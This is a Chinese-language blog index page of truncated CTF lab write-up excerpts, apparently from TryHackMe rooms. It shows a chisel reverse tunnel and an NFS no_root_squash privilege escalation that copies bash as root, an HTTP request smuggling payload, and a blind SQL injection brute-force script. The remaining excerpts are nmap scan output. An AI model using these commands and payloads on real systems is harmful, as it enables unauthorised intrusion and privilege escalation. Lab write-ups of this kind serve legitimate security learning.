MoonlitSyntax

gpg --import '/home/kali/Desktop/priv.key' gpg --output decrypted-file --decrypt '*.gpg' 破解出来的是个啥 啊 是个xlsx 回复后缀并查看,可以发现一些东西 ftp上去发现是那个库,这时候本来上传一个马就行了,但是不知道为什么传不上去 传到…/就行了web目录 玛德,又是linpeas 一堆看不懂的, nsf服务是个啥 2049端口的服务,先挂个代理 ./chisel server --reverse --port 9002 ./chisel client 10.10.37.90:9002 R:2049:127.0.0.1:2049 然后 sudo mount -t nfs -o port=2049 localhost:/ /tmp/share 就能把远程的服务挂在本地/tmp/share下了,由于是no_root_squash 我们在对/share内文件执行命令的时候,共享到了远程的服务,也就是 cp /bin/bash fuck_bash chown root.root fuck_bas ...

前后端处理差异 CL.TEContent-Length/Transfer-Encoding TE.CL正好反过来 TE.TE 利用编码不同 POST / HTTP/1.1Host: example.comContent-length: 4Transfer-Encoding: chunkedTransfer-Encoding: chunked14cPOST /update HTTP/1.1Host: example.comContent-length: 15isadmin=true0 这样爆破 为什么能返回 不理解啊!!! 别人的请求错误的和我的请求合并了???

教学关…最后一个是个目录,服了

完整脚本 import requestsurl = 'http://10.10.196.247/index.php'dicts = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890_{}'flag = ''for i in range(1, 100): found = False for charactor in dicts: # payload = f"' UNION SELECT 1,2,3,4 WHERE database() LIKE '{flag}{charactor}%'--+" # payload = f"' UNION SELECT 1,2,3,4 FROM information_schema.tables WHERE table_schema = 'my ...

依旧教学关 Starting Nmap 7.60 ( https://nmap.org ) at 2024-02-09 07:59 GMTNmap scan report for ip-10-10-40-59.eu-west-1.compute.internal (10.10.40.59)Host is up (0.00043s latency).Not shown: 996 closed portsPORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)80/tcp open http Apache httpd 2.4.41 ((Ubuntu))| http-cookie-flags: | /: | PHPSESSID: |_ httponly flag not set|_http-server-header: Ap ...

Starting Nmap 7.60 ( https://nmap.org ) at 2024-02-10 07:25 GMTNmap scan report for ip-10-10-198-97.eu-west-1.compute.internal (10.10.198.97)Host is up (0.00038s latency).Not shown: 997 filtered portsPORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)80/tcp open http Apache httpd 2.4.41|_http-server-header: Apache/2.4.41 (Ubuntu)|_http-title: 403 Forbidden443/tcp open ssl/http Apache httpd 2.4.41|_http-server-header: Apache/2.4 ...